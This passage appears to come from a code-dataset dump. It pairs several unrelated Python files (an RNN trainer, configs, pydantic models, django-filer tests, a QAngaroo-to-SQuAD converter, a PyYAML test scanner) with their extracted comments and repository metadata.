exceeds the max allowable size then drop the leading # characters on the floor. ######################################################################## # Wakeup helpers. ######################################################################## Send a wakeup to the device. Overridden by device specific subclasses. Clear buffers and send a wakeup command to the instrument @param timeout The timeout to wake the device. @param delay The time to wait between consecutive wakeups. @throw InstrumentTimeoutException if the device could not be woken. # Clear the prompt buffer. # Grab time for timeout. # Send a line return and wait a sec. # We're going to build two complete sets of ADCP parameters here # one set for the master instrument and one for the slave # Scheduled events are handled by the master # now we're going to build a whole 'nother param dict for the slave parameters # that contain regex values so we can fill them in easily... # Scheduled events are handled by the master # ####################################################################### # Private helpers. # ####################################################################### The base class got_data has gotten a chunk from the chunker. Pass it to extract_sample with the appropriate particle objects and REGEXes. # Only BEAM transform supported for VADCP Send a BREAK to attempt to wake the device. Send the command to the instrument to synchronize the clock @param command set command @param date_time_param: date time parameter that we want to set @param timeout: command timeout @param delay: wakeup delay @param time_format: time format string for set command # ####################################################################### # Startup parameter handlers ######################################################################## Update the parameter dictionary. # see if we passed in a list of parameters to query # if not, use the whole parameter list # filter out the engineering parameters and ALL # Get old param dict config. # MASTER # SLAVE # Check if there is any changes. Ignore TT # we are going to send the concatenation of all our set commands # we'll need to build a regular expression to retrieve all of the responses # including any possible errors Issue commands to the instrument to set various parameters # Handle engineering parameters Send a BREAK to attempt to wake the device. Command the instrument to start logging @param timeout: how long to wait for a prompt @throws: InstrumentProtocolException if failed to start logging # start the slave first, it collects on signal from master # stop the master first (slave only collects on signal from master) Discover current state; can be COMMAND or AUTOSAMPLE or UNKNOWN. @throws InstrumentTimeoutException if the device cannot be woken. @throws InstrumentStateException if the device response does not correspond to an expected state. # states match, return this state # states don't match ######################################################################## # COMMAND handlers. ######################################################################## execute a get status @return next_state, (next_state, result) if successful. @throws InstrumentProtocolException from _do_cmd_resp. ###################################################### # DIRECT_ACCESS handlers ###################################################### # add sent command to list for 'echo' filtering in callback
| 1.229998
| 1
|
temp/rnn_interface.py
|
deepakrana47/character-predictor
| 1
|
6628493
|
import numpy as np, pickle
def sample_formation(text, seq_length, map_vect):
samples = []
t_size = len(text)
for i in range(0, t_size - seq_length - 1):
x = [map_vect[j] for j in text[i: i + seq_length]]
y = [map_vect[j] for j in text[i + 1: i + seq_length + 1]]
samples.append((x, y))
return samples
def train(fname, rnn, map_vect):
text = open(fname,'r').read()
chars = list(set(text))
v_size, t_size = len(chars), len(text)
# recurrent NN initalization
model = rnn(v_size, 250, v_size, optimize='rmsprop')
# sample generation
seq_length = 25
samples = sample_formation(text, seq_length, map_vect)
# RNN training parameter
batch = 100
miter = 20
epoch0 = epoch = 60
print "training start."
while epoch > 0:
itr = 0
while itr < miter:
deltaw = {}
deltab= {}
err = 0
# mini_batch foramtion
mini_batch = [samples[np.random.randint(0, len(samples))] for i in range(batch)]
# mini_batch training
while mini_batch:
x,y = mini_batch.pop()
model.forward_pass(x)
dw, db, e = model.backward_pass(y)
for j in dw:
if j in deltaw:
deltaw[j]+=dw[j]
else:
deltaw[j]=dw[j]
for j in db:
if j in deltab:
deltab[j]+=db[j]
else:
deltab[j]=db[j]
err += e
# updating Recurrent network
model.weight_update(model, {j:deltaw[j]/batch for j in deltaw}, {j:deltab[j]/batch for j in deltab}, neta=0.01)
print '\t',itr,"batch error is",err/batch
itr += 1
print "\n %d epoch is completed\n" % (epoch0-epoch)
epoch -= 1
print "training complete."
model.save_model('weights.pickle')
return model
def test(fname, model, map_vect):
text = open(fname, 'r').read()
# sample generation
seq_length = 25
samples = sample_formation(text, seq_length, map_vect)
# setting testing parameters
iters = 1000
correct = 0.0
itr = 0
# testing of RNN
print "\ntesting start."
while itr < iters:
# selecting random sample from samples
x, y = samples[np.random.randint(0, len(samples))]
# producing output
_o = model.forward_pass(x)
if np.argmax(_o[-1]) == np.argmax(y[-1]):
correct += 1
itr += 1
print "\ntesting complete.\n"
print "correct:\t",correct
print "incorrect:\t",iters-correct
print "\naccuracy:\t",correct/iters
|
import numpy as np, pickle
def sample_formation(text, seq_length, map_vect):
samples = []
t_size = len(text)
for i in range(0, t_size - seq_length - 1):
x = [map_vect[j] for j in text[i: i + seq_length]]
y = [map_vect[j] for j in text[i + 1: i + seq_length + 1]]
samples.append((x, y))
return samples
def train(fname, rnn, map_vect):
text = open(fname,'r').read()
chars = list(set(text))
v_size, t_size = len(chars), len(text)
# recurrent NN initalization
model = rnn(v_size, 250, v_size, optimize='rmsprop')
# sample generation
seq_length = 25
samples = sample_formation(text, seq_length, map_vect)
# RNN training parameter
batch = 100
miter = 20
epoch0 = epoch = 60
print "training start."
while epoch > 0:
itr = 0
while itr < miter:
deltaw = {}
deltab= {}
err = 0
# mini_batch foramtion
mini_batch = [samples[np.random.randint(0, len(samples))] for i in range(batch)]
# mini_batch training
while mini_batch:
x,y = mini_batch.pop()
model.forward_pass(x)
dw, db, e = model.backward_pass(y)
for j in dw:
if j in deltaw:
deltaw[j]+=dw[j]
else:
deltaw[j]=dw[j]
for j in db:
if j in deltab:
deltab[j]+=db[j]
else:
deltab[j]=db[j]
err += e
# updating Recurrent network
model.weight_update(model, {j:deltaw[j]/batch for j in deltaw}, {j:deltab[j]/batch for j in deltab}, neta=0.01)
print '\t',itr,"batch error is",err/batch
itr += 1
print "\n %d epoch is completed\n" % (epoch0-epoch)
epoch -= 1
print "training complete."
model.save_model('weights.pickle')
return model
def test(fname, model, map_vect):
text = open(fname, 'r').read()
# sample generation
seq_length = 25
samples = sample_formation(text, seq_length, map_vect)
# setting testing parameters
iters = 1000
correct = 0.0
itr = 0
# testing of RNN
print "\ntesting start."
while itr < iters:
# selecting random sample from samples
x, y = samples[np.random.randint(0, len(samples))]
# producing output
_o = model.forward_pass(x)
if np.argmax(_o[-1]) == np.argmax(y[-1]):
correct += 1
itr += 1
print "\ntesting complete.\n"
print "correct:\t",correct
print "incorrect:\t",iters-correct
print "\naccuracy:\t",correct/iters
|
en
| 0.597322
|
# recurrent NN initalization # sample generation # RNN training parameter # mini_batch foramtion # mini_batch training # updating Recurrent network # sample generation # setting testing parameters # testing of RNN # selecting random sample from samples # producing output
| 2.517262
| 3
|
configs/litehrnet/fcn_litehr18-without-head_512x1024_8x2_160k_cityscapes.py
|
Junjun2016/LiteHRNet
| 12
|
6628494
|
<reponame>Junjun2016/LiteHRNet
_base_ = [
'../_base_/models/fcn_litehr18-without-head.py',
'../_base_/datasets/cityscapes.py', '../_base_/default_runtime.py',
'../_base_/schedules/schedule_160k.py'
]
find_unused_parameters = True
|
_base_ = [
'../_base_/models/fcn_litehr18-without-head.py',
'../_base_/datasets/cityscapes.py', '../_base_/default_runtime.py',
'../_base_/schedules/schedule_160k.py'
]
find_unused_parameters = True
|
none
| 1
| 1.118231
| 1
|
|
pygismeteo_base/models/search_by_coordinates.py
|
monosans/pygismeteo-base
| 2
|
6628495
|
from typing import List, Optional
from pydantic import BaseModel, Field
class District(BaseModel):
name: str
name_p: str = Field(..., alias="nameP")
class SubDistrict(BaseModel):
name: str
name_p: str = Field(..., alias="nameP")
class Country(BaseModel):
name: Optional[str]
code: str
name_p: Optional[str] = Field(..., alias="nameP")
class ModelItem(BaseModel):
district: Optional[District]
id: int
sub_district: Optional[SubDistrict]
url: str
name_p: Optional[str] = Field(..., alias="nameP")
name: Optional[str]
distance: float
kind: str
country: Country
class Model(BaseModel):
__root__: List[ModelItem]
|
from typing import List, Optional
from pydantic import BaseModel, Field
class District(BaseModel):
name: str
name_p: str = Field(..., alias="nameP")
class SubDistrict(BaseModel):
name: str
name_p: str = Field(..., alias="nameP")
class Country(BaseModel):
name: Optional[str]
code: str
name_p: Optional[str] = Field(..., alias="nameP")
class ModelItem(BaseModel):
district: Optional[District]
id: int
sub_district: Optional[SubDistrict]
url: str
name_p: Optional[str] = Field(..., alias="nameP")
name: Optional[str]
distance: float
kind: str
country: Country
class Model(BaseModel):
__root__: List[ModelItem]
|
none
| 1
| 2.96139
| 3
|
|
tests/test_utils.py
|
messi19950304/django-file
| 889
|
6628496
|
import os
from zipfile import ZipFile
from django.conf import settings
from django.core.files import File as DjangoFile
from django.test.testcases import TestCase
from tests.helpers import create_image
from filer.utils.loader import load_object
from filer.utils.zip import unzip
# Some target classes for the classloading tests
class TestTargetSuperClass:
pass
class TestTargetClass(TestTargetSuperClass):
pass
# Testing the classloader
class ClassLoaderTestCase(TestCase):
''' Tests filer.utils.loader.load() '''
def test_loader_loads_strings_properly(self):
target = 'tests.test_utils.TestTargetClass'
result = load_object(target) # Should return an instance
self.assertEqual(result, TestTargetClass)
def test_loader_loads_class(self):
result = load_object(TestTargetClass())
self.assertEqual(result.__class__, TestTargetClass)
def test_loader_loads_subclass(self):
result = load_object(TestTargetClass)
self.assertEqual(result, TestTargetClass)
# Testing the zipping/unzipping of files
class ZippingTestCase(TestCase):
def setUp(self):
self.img = create_image()
self.image_name = 'test_file.jpg'
self.filename = os.path.join(settings.FILE_UPLOAD_TEMP_DIR, self.image_name)
self.img.save(self.filename, 'JPEG')
self.file = DjangoFile(open(self.filename, 'rb'), name=self.image_name)
self.zipfilename = 'test_zip.zip'
self.zip = ZipFile(self.zipfilename, 'a')
self.zip.write(self.filename)
self.zip.close()
def tearDown(self):
# Clean up the created zip file
os.remove(self.zipfilename)
os.remove(self.filename)
def test_unzipping_works(self):
result = unzip(self.zipfilename)
self.assertEqual(result[0][0].name, self.file.name)
|
import os
from zipfile import ZipFile
from django.conf import settings
from django.core.files import File as DjangoFile
from django.test.testcases import TestCase
from tests.helpers import create_image
from filer.utils.loader import load_object
from filer.utils.zip import unzip
# Some target classes for the classloading tests
class TestTargetSuperClass:
pass
class TestTargetClass(TestTargetSuperClass):
pass
# Testing the classloader
class ClassLoaderTestCase(TestCase):
''' Tests filer.utils.loader.load() '''
def test_loader_loads_strings_properly(self):
target = 'tests.test_utils.TestTargetClass'
result = load_object(target) # Should return an instance
self.assertEqual(result, TestTargetClass)
def test_loader_loads_class(self):
result = load_object(TestTargetClass())
self.assertEqual(result.__class__, TestTargetClass)
def test_loader_loads_subclass(self):
result = load_object(TestTargetClass)
self.assertEqual(result, TestTargetClass)
# Testing the zipping/unzipping of files
class ZippingTestCase(TestCase):
def setUp(self):
self.img = create_image()
self.image_name = 'test_file.jpg'
self.filename = os.path.join(settings.FILE_UPLOAD_TEMP_DIR, self.image_name)
self.img.save(self.filename, 'JPEG')
self.file = DjangoFile(open(self.filename, 'rb'), name=self.image_name)
self.zipfilename = 'test_zip.zip'
self.zip = ZipFile(self.zipfilename, 'a')
self.zip.write(self.filename)
self.zip.close()
def tearDown(self):
# Clean up the created zip file
os.remove(self.zipfilename)
os.remove(self.filename)
def test_unzipping_works(self):
result = unzip(self.zipfilename)
self.assertEqual(result[0][0].name, self.file.name)
|
en
| 0.590469
|
# Some target classes for the classloading tests # Testing the classloader Tests filer.utils.loader.load() # Should return an instance # Testing the zipping/unzipping of files # Clean up the created zip file
| 2.481917
| 2
|
FBA_tutorials/utils/show_map.py
|
HansWesterhoff/Systems_Biology_FBA_tutorial
| 6
|
6628497
|
<gh_stars>1-10
import escher,escher.urls,json,os
from IPython.display import HTML
def show_map(sol,map_loc,color=0):
''' Returns an escher Builder object for solution 'sol', map 'map_loc' and the supplied color scheme.
sol: the solution object containing the simulation results.
map_loc: filename of the map json
color: color scheme to use
'''
if color == 0:
colors = [{'type': 'min', 'color': '#cccccc', 'size': 5},# grey to green to orange
{'type': 'mean', 'color': '#007F00', 'size': 10},
{'type': 'max', 'color': '#f0a900', 'size': 15}]
else:
print('Color scheme not defined!')
return
if type(sol) != dict:
try:
d = sol.fluxes
except:
print('An empty solution was passed.')
d = {}
else:
d = sol # shorthand
d2 = {} # for some reason my types (from float 64 to float) were not updating and with a new dictionary they do
for key in d.keys(): # remove output like this: 1.653e-15
d2[key] = round(float(d[key]),6)
network = escher.Builder(map_json=map_loc, reaction_data=d2,
reaction_styles=['color', 'size', 'abs', 'text'],
# change the default colors, blue to purple to red
reaction_scale=colors,
hide_secondary_metabolites=False,secondary_metabolite_radius=10,
highlight_missing=True)
return network
|
import escher,escher.urls,json,os
from IPython.display import HTML
def show_map(sol,map_loc,color=0):
''' Returns an escher Builder object for solution 'sol', map 'map_loc' and the supplied color scheme.
sol: the solution object containing the simulation results.
map_loc: filename of the map json
color: color scheme to use
'''
if color == 0:
colors = [{'type': 'min', 'color': '#cccccc', 'size': 5},# grey to green to orange
{'type': 'mean', 'color': '#007F00', 'size': 10},
{'type': 'max', 'color': '#f0a900', 'size': 15}]
else:
print('Color scheme not defined!')
return
if type(sol) != dict:
try:
d = sol.fluxes
except:
print('An empty solution was passed.')
d = {}
else:
d = sol # shorthand
d2 = {} # for some reason my types (from float 64 to float) were not updating and with a new dictionary they do
for key in d.keys(): # remove output like this: 1.653e-15
d2[key] = round(float(d[key]),6)
network = escher.Builder(map_json=map_loc, reaction_data=d2,
reaction_styles=['color', 'size', 'abs', 'text'],
# change the default colors, blue to purple to red
reaction_scale=colors,
hide_secondary_metabolites=False,secondary_metabolite_radius=10,
highlight_missing=True)
return network
|
en
| 0.756942
|
Returns an escher Builder object for solution 'sol', map 'map_loc' and the supplied color scheme. sol: the solution object containing the simulation results. map_loc: filename of the map json color: color scheme to use # grey to green to orange # shorthand # for some reason my types (from float 64 to float) were not updating and with a new dictionary they do # remove output like this: 1.653e-15 # change the default colors, blue to purple to red
| 2.603073
| 3
|
bagpipe/exabgp/version.py
|
taheri0/MPLS-over-GRE
| 94
|
6628498
|
<reponame>taheri0/MPLS-over-GRE
version="2.0.8"
# Do not change the first line as it is parsed by scripts
if __name__ == '__main__':
import sys
sys.stdout.write(version)
|
version="2.0.8"
# Do not change the first line as it is parsed by scripts
if __name__ == '__main__':
import sys
sys.stdout.write(version)
|
en
| 0.985608
|
# Do not change the first line as it is parsed by scripts
| 1.167568
| 1
|
data/QAngaroo/qangaroo2squad.py
|
elyase/jack
| 192
|
6628499
|
import json
import sys
def load_json(path):
with open(path, 'r') as f:
return json.load(f)
def convert2SQUAD_format(hoppy_data, write_file_name):
"""
Converts QAngaroo data (hoppy_data) into SQuAD format.
The SQuAD-formatted data is written to disk at write_file_name.
Note: All given support documents per example are concatenated
into one super-document. All text is lowercased.
"""
# adapt the JSON tree structure used in SQUAD.
squad_formatted_content = dict()
squad_formatted_content['version'] = 'hoppy_squad_format'
data = []
# loop over dataset
for datum in hoppy_data:
# Format is deeply nested JSON -- prepare data structures
data_ELEMENT = dict()
data_ELEMENT['title'] = 'dummyTitle'
paragraphs = []
paragraphs_ELEMENT = dict()
qas = []
qas_ELEMENT = dict()
qas_ELEMENT_ANSWERS = []
ANSWERS_ELEMENT = dict()
### content start
qas_ELEMENT['id'] = datum['id']
qas_ELEMENT['question'] = datum['query']
# concatenate all support documents into one superdocument
superdocument = " <new_doc> ".join(datum['supports']).lower()
# where is the answer in the superdocument?
answer_position = superdocument.find(datum['answer'].lower())
if answer_position == -1:
continue
ANSWERS_ELEMENT['answer_start'] = answer_position
ANSWERS_ELEMENT['text'] = datum['answer'].lower()
### content end
# recursively fill in content into the nested SQuAD data format
paragraphs_ELEMENT['context'] = superdocument
qas_ELEMENT_ANSWERS.append(ANSWERS_ELEMENT)
qas_ELEMENT['answers'] = qas_ELEMENT_ANSWERS
qas.append(qas_ELEMENT)
paragraphs_ELEMENT['qas'] = qas
paragraphs.append(paragraphs_ELEMENT)
data_ELEMENT['paragraphs'] = paragraphs
data.append(data_ELEMENT)
squad_formatted_content['data'] = data
with open(write_file_name, 'w') as f:
json.dump(squad_formatted_content, f, indent=1)
print('Done writing SQuAD-formatted data to: ',write_file_name)
def main():
input_path = sys.argv[1]
output_path = sys.argv[2]
convert2SQUAD_format(load_json(input_path), output_path)
if __name__ == "__main__":
main()
|
import json
import sys
def load_json(path):
with open(path, 'r') as f:
return json.load(f)
def convert2SQUAD_format(hoppy_data, write_file_name):
"""
Converts QAngaroo data (hoppy_data) into SQuAD format.
The SQuAD-formatted data is written to disk at write_file_name.
Note: All given support documents per example are concatenated
into one super-document. All text is lowercased.
"""
# adapt the JSON tree structure used in SQUAD.
squad_formatted_content = dict()
squad_formatted_content['version'] = 'hoppy_squad_format'
data = []
# loop over dataset
for datum in hoppy_data:
# Format is deeply nested JSON -- prepare data structures
data_ELEMENT = dict()
data_ELEMENT['title'] = 'dummyTitle'
paragraphs = []
paragraphs_ELEMENT = dict()
qas = []
qas_ELEMENT = dict()
qas_ELEMENT_ANSWERS = []
ANSWERS_ELEMENT = dict()
### content start
qas_ELEMENT['id'] = datum['id']
qas_ELEMENT['question'] = datum['query']
# concatenate all support documents into one superdocument
superdocument = " <new_doc> ".join(datum['supports']).lower()
# where is the answer in the superdocument?
answer_position = superdocument.find(datum['answer'].lower())
if answer_position == -1:
continue
ANSWERS_ELEMENT['answer_start'] = answer_position
ANSWERS_ELEMENT['text'] = datum['answer'].lower()
### content end
# recursively fill in content into the nested SQuAD data format
paragraphs_ELEMENT['context'] = superdocument
qas_ELEMENT_ANSWERS.append(ANSWERS_ELEMENT)
qas_ELEMENT['answers'] = qas_ELEMENT_ANSWERS
qas.append(qas_ELEMENT)
paragraphs_ELEMENT['qas'] = qas
paragraphs.append(paragraphs_ELEMENT)
data_ELEMENT['paragraphs'] = paragraphs
data.append(data_ELEMENT)
squad_formatted_content['data'] = data
with open(write_file_name, 'w') as f:
json.dump(squad_formatted_content, f, indent=1)
print('Done writing SQuAD-formatted data to: ',write_file_name)
def main():
input_path = sys.argv[1]
output_path = sys.argv[2]
convert2SQUAD_format(load_json(input_path), output_path)
if __name__ == "__main__":
main()
|
en
| 0.793152
|
Converts QAngaroo data (hoppy_data) into SQuAD format. The SQuAD-formatted data is written to disk at write_file_name. Note: All given support documents per example are concatenated into one super-document. All text is lowercased. # adapt the JSON tree structure used in SQUAD. # loop over dataset # Format is deeply nested JSON -- prepare data structures ### content start # concatenate all support documents into one superdocument # where is the answer in the superdocument? ### content end # recursively fill in content into the nested SQuAD data format
| 3.121277
| 3
|
desktop/core/ext-py/PyYAML-3.09/tests/lib3/canonical.py
|
t3hi3x/hue
| 19
|
6628500
|
<filename>desktop/core/ext-py/PyYAML-3.09/tests/lib3/canonical.py
import yaml, yaml.composer, yaml.constructor, yaml.resolver
class CanonicalError(yaml.YAMLError):
pass
class CanonicalScanner:
def __init__(self, data):
if isinstance(data, bytes):
try:
data = data.decode('utf-8')
except UnicodeDecodeError:
raise CanonicalError("utf-8 stream is expected")
self.data = data+'\0'
self.index = 0
self.tokens = []
self.scanned = False
def check_token(self, *choices):
if not self.scanned:
self.scan()
if self.tokens:
if not choices:
return True
for choice in choices:
if isinstance(self.tokens[0], choice):
return True
return False
def peek_token(self):
if not self.scanned:
self.scan()
if self.tokens:
return self.tokens[0]
def get_token(self, choice=None):
if not self.scanned:
self.scan()
token = self.tokens.pop(0)
if choice and not isinstance(token, choice):
raise CanonicalError("unexpected token "+repr(token))
return token
def get_token_value(self):
token = self.get_token()
return token.value
def scan(self):
self.tokens.append(yaml.StreamStartToken(None, None))
while True:
self.find_token()
ch = self.data[self.index]
if ch == '\0':
self.tokens.append(yaml.StreamEndToken(None, None))
break
elif ch == '%':
self.tokens.append(self.scan_directive())
elif ch == '-' and self.data[self.index:self.index+3] == '---':
self.index += 3
self.tokens.append(yaml.DocumentStartToken(None, None))
elif ch == '[':
self.index += 1
self.tokens.append(yaml.FlowSequenceStartToken(None, None))
elif ch == '{':
self.index += 1
self.tokens.append(yaml.FlowMappingStartToken(None, None))
elif ch == ']':
self.index += 1
self.tokens.append(yaml.FlowSequenceEndToken(None, None))
elif ch == '}':
self.index += 1
self.tokens.append(yaml.FlowMappingEndToken(None, None))
elif ch == '?':
self.index += 1
self.tokens.append(yaml.KeyToken(None, None))
elif ch == ':':
self.index += 1
self.tokens.append(yaml.ValueToken(None, None))
elif ch == ',':
self.index += 1
self.tokens.append(yaml.FlowEntryToken(None, None))
elif ch == '*' or ch == '&':
self.tokens.append(self.scan_alias())
elif ch == '!':
self.tokens.append(self.scan_tag())
elif ch == '"':
self.tokens.append(self.scan_scalar())
else:
raise CanonicalError("invalid token")
self.scanned = True
DIRECTIVE = '%YAML 1.1'
def scan_directive(self):
if self.data[self.index:self.index+len(self.DIRECTIVE)] == self.DIRECTIVE and \
self.data[self.index+len(self.DIRECTIVE)] in ' \n\0':
self.index += len(self.DIRECTIVE)
return yaml.DirectiveToken('YAML', (1, 1), None, None)
else:
raise CanonicalError("invalid directive")
def scan_alias(self):
if self.data[self.index] == '*':
TokenClass = yaml.AliasToken
else:
TokenClass = yaml.AnchorToken
self.index += 1
start = self.index
while self.data[self.index] not in ', \n\0':
self.index += 1
value = self.data[start:self.index]
return TokenClass(value, None, None)
def scan_tag(self):
self.index += 1
start = self.index
while self.data[self.index] not in ' \n\0':
self.index += 1
value = self.data[start:self.index]
if not value:
value = '!'
elif value[0] == '!':
value = 'tag:yaml.org,2002:'+value[1:]
elif value[0] == '<' and value[-1] == '>':
value = value[1:-1]
else:
value = '!'+value
return yaml.TagToken(value, None, None)
QUOTE_CODES = {
'x': 2,
'u': 4,
'U': 8,
}
QUOTE_REPLACES = {
'\\': '\\',
'\"': '\"',
' ': ' ',
'a': '\x07',
'b': '\x08',
'e': '\x1B',
'f': '\x0C',
'n': '\x0A',
'r': '\x0D',
't': '\x09',
'v': '\x0B',
'N': '\u0085',
'L': '\u2028',
'P': '\u2029',
'_': '_',
'0': '\x00',
}
def scan_scalar(self):
self.index += 1
chunks = []
start = self.index
ignore_spaces = False
while self.data[self.index] != '"':
if self.data[self.index] == '\\':
ignore_spaces = False
chunks.append(self.data[start:self.index])
self.index += 1
ch = self.data[self.index]
self.index += 1
if ch == '\n':
ignore_spaces = True
elif ch in self.QUOTE_CODES:
length = self.QUOTE_CODES[ch]
code = int(self.data[self.index:self.index+length], 16)
chunks.append(chr(code))
self.index += length
else:
if ch not in self.QUOTE_REPLACES:
raise CanonicalError("invalid escape code")
chunks.append(self.QUOTE_REPLACES[ch])
start = self.index
elif self.data[self.index] == '\n':
chunks.append(self.data[start:self.index])
chunks.append(' ')
self.index += 1
start = self.index
ignore_spaces = True
elif ignore_spaces and self.data[self.index] == ' ':
self.index += 1
start = self.index
else:
ignore_spaces = False
self.index += 1
chunks.append(self.data[start:self.index])
self.index += 1
return yaml.ScalarToken(''.join(chunks), False, None, None)
def find_token(self):
found = False
while not found:
while self.data[self.index] in ' \t':
self.index += 1
if self.data[self.index] == '#':
while self.data[self.index] != '\n':
self.index += 1
if self.data[self.index] == '\n':
self.index += 1
else:
found = True
class CanonicalParser:
def __init__(self):
self.events = []
self.parsed = False
# stream: STREAM-START document* STREAM-END
def parse_stream(self):
self.get_token(yaml.StreamStartToken)
self.events.append(yaml.StreamStartEvent(None, None))
while not self.check_token(yaml.StreamEndToken):
if self.check_token(yaml.DirectiveToken, yaml.DocumentStartToken):
self.parse_document()
else:
raise CanonicalError("document is expected, got "+repr(self.tokens[0]))
self.get_token(yaml.StreamEndToken)
self.events.append(yaml.StreamEndEvent(None, None))
# document: DIRECTIVE? DOCUMENT-START node
def parse_document(self):
node = None
if self.check_token(yaml.DirectiveToken):
self.get_token(yaml.DirectiveToken)
self.get_token(yaml.DocumentStartToken)
self.events.append(yaml.DocumentStartEvent(None, None))
self.parse_node()
self.events.append(yaml.DocumentEndEvent(None, None))
# node: ALIAS | ANCHOR? TAG? (SCALAR|sequence|mapping)
def parse_node(self):
if self.check_token(yaml.AliasToken):
self.events.append(yaml.AliasEvent(self.get_token_value(), None, None))
else:
anchor = None
if self.check_token(yaml.AnchorToken):
anchor = self.get_token_value()
tag = None
if self.check_token(yaml.TagToken):
tag = self.get_token_value()
if self.check_token(yaml.ScalarToken):
self.events.append(yaml.ScalarEvent(anchor, tag, (False, False), self.get_token_value(), None, None))
elif self.check_token(yaml.FlowSequenceStartToken):
self.events.append(yaml.SequenceStartEvent(anchor, tag, None, None))
self.parse_sequence()
elif self.check_token(yaml.FlowMappingStartToken):
self.events.append(yaml.MappingStartEvent(anchor, tag, None, None))
self.parse_mapping()
else:
raise CanonicalError("SCALAR, '[', or '{' is expected, got "+repr(self.tokens[0]))
# sequence: SEQUENCE-START (node (ENTRY node)*)? ENTRY? SEQUENCE-END
def parse_sequence(self):
self.get_token(yaml.FlowSequenceStartToken)
if not self.check_token(yaml.FlowSequenceEndToken):
self.parse_node()
while not self.check_token(yaml.FlowSequenceEndToken):
self.get_token(yaml.FlowEntryToken)
if not self.check_token(yaml.FlowSequenceEndToken):
self.parse_node()
self.get_token(yaml.FlowSequenceEndToken)
self.events.append(yaml.SequenceEndEvent(None, None))
# mapping: MAPPING-START (map_entry (ENTRY map_entry)*)? ENTRY? MAPPING-END
def parse_mapping(self):
self.get_token(yaml.FlowMappingStartToken)
if not self.check_token(yaml.FlowMappingEndToken):
self.parse_map_entry()
while not self.check_token(yaml.FlowMappingEndToken):
self.get_token(yaml.FlowEntryToken)
if not self.check_token(yaml.FlowMappingEndToken):
self.parse_map_entry()
self.get_token(yaml.FlowMappingEndToken)
self.events.append(yaml.MappingEndEvent(None, None))
# map_entry: KEY node VALUE node
def parse_map_entry(self):
self.get_token(yaml.KeyToken)
self.parse_node()
self.get_token(yaml.ValueToken)
self.parse_node()
def parse(self):
self.parse_stream()
self.parsed = True
def get_event(self):
if not self.parsed:
self.parse()
return self.events.pop(0)
def check_event(self, *choices):
if not self.parsed:
self.parse()
if self.events:
if not choices:
return True
for choice in choices:
if isinstance(self.events[0], choice):
return True
return False
def peek_event(self):
if not self.parsed:
self.parse()
return self.events[0]
class CanonicalLoader(CanonicalScanner, CanonicalParser,
yaml.composer.Composer, yaml.constructor.Constructor, yaml.resolver.Resolver):
def __init__(self, stream):
if hasattr(stream, 'read'):
stream = stream.read()
CanonicalScanner.__init__(self, stream)
CanonicalParser.__init__(self)
yaml.composer.Composer.__init__(self)
yaml.constructor.Constructor.__init__(self)
yaml.resolver.Resolver.__init__(self)
yaml.CanonicalLoader = CanonicalLoader
def canonical_scan(stream):
return yaml.scan(stream, Loader=CanonicalLoader)
yaml.canonical_scan = canonical_scan
def canonical_parse(stream):
return yaml.parse(stream, Loader=CanonicalLoader)
yaml.canonical_parse = canonical_parse
def canonical_compose(stream):
return yaml.compose(stream, Loader=CanonicalLoader)
yaml.canonical_compose = canonical_compose
def canonical_compose_all(stream):
return yaml.compose_all(stream, Loader=CanonicalLoader)
yaml.canonical_compose_all = canonical_compose_all
def canonical_load(stream):
return yaml.load(stream, Loader=CanonicalLoader)
yaml.canonical_load = canonical_load
def canonical_load_all(stream):
return yaml.load_all(stream, Loader=CanonicalLoader)
yaml.canonical_load_all = canonical_load_all
|
<filename>desktop/core/ext-py/PyYAML-3.09/tests/lib3/canonical.py
import yaml, yaml.composer, yaml.constructor, yaml.resolver
class CanonicalError(yaml.YAMLError):
pass
class CanonicalScanner:
def __init__(self, data):
if isinstance(data, bytes):
try:
data = data.decode('utf-8')
except UnicodeDecodeError:
raise CanonicalError("utf-8 stream is expected")
self.data = data+'\0'
self.index = 0
self.tokens = []
self.scanned = False
def check_token(self, *choices):
if not self.scanned:
self.scan()
if self.tokens:
if not choices:
return True
for choice in choices:
if isinstance(self.tokens[0], choice):
return True
return False
def peek_token(self):
if not self.scanned:
self.scan()
if self.tokens:
return self.tokens[0]
def get_token(self, choice=None):
if not self.scanned:
self.scan()
token = self.tokens.pop(0)
if choice and not isinstance(token, choice):
raise CanonicalError("unexpected token "+repr(token))
return token
def get_token_value(self):
token = self.get_token()
return token.value
def scan(self):
self.tokens.append(yaml.StreamStartToken(None, None))
while True:
self.find_token()
ch = self.data[self.index]
if ch == '\0':
self.tokens.append(yaml.StreamEndToken(None, None))
break
elif ch == '%':
self.tokens.append(self.scan_directive())
elif ch == '-' and self.data[self.index:self.index+3] == '---':
self.index += 3
self.tokens.append(yaml.DocumentStartToken(None, None))
elif ch == '[':
self.index += 1
self.tokens.append(yaml.FlowSequenceStartToken(None, None))
elif ch == '{':
self.index += 1
self.tokens.append(yaml.FlowMappingStartToken(None, None))
elif ch == ']':
self.index += 1
self.tokens.append(yaml.FlowSequenceEndToken(None, None))
elif ch == '}':
self.index += 1
self.tokens.append(yaml.FlowMappingEndToken(None, None))
elif ch == '?':
self.index += 1
self.tokens.append(yaml.KeyToken(None, None))
elif ch == ':':
self.index += 1
self.tokens.append(yaml.ValueToken(None, None))
elif ch == ',':
self.index += 1
self.tokens.append(yaml.FlowEntryToken(None, None))
elif ch == '*' or ch == '&':
self.tokens.append(self.scan_alias())
elif ch == '!':
self.tokens.append(self.scan_tag())
elif ch == '"':
self.tokens.append(self.scan_scalar())
else:
raise CanonicalError("invalid token")
self.scanned = True
DIRECTIVE = '%YAML 1.1'
def scan_directive(self):
if self.data[self.index:self.index+len(self.DIRECTIVE)] == self.DIRECTIVE and \
self.data[self.index+len(self.DIRECTIVE)] in ' \n\0':
self.index += len(self.DIRECTIVE)
return yaml.DirectiveToken('YAML', (1, 1), None, None)
else:
raise CanonicalError("invalid directive")
def scan_alias(self):
if self.data[self.index] == '*':
TokenClass = yaml.AliasToken
else:
TokenClass = yaml.AnchorToken
self.index += 1
start = self.index
while self.data[self.index] not in ', \n\0':
self.index += 1
value = self.data[start:self.index]
return TokenClass(value, None, None)
def scan_tag(self):
self.index += 1
start = self.index
while self.data[self.index] not in ' \n\0':
self.index += 1
value = self.data[start:self.index]
if not value:
value = '!'
elif value[0] == '!':
value = 'tag:yaml.org,2002:'+value[1:]
elif value[0] == '<' and value[-1] == '>':
value = value[1:-1]
else:
value = '!'+value
return yaml.TagToken(value, None, None)
QUOTE_CODES = {
'x': 2,
'u': 4,
'U': 8,
}
QUOTE_REPLACES = {
'\\': '\\',
'\"': '\"',
' ': ' ',
'a': '\x07',
'b': '\x08',
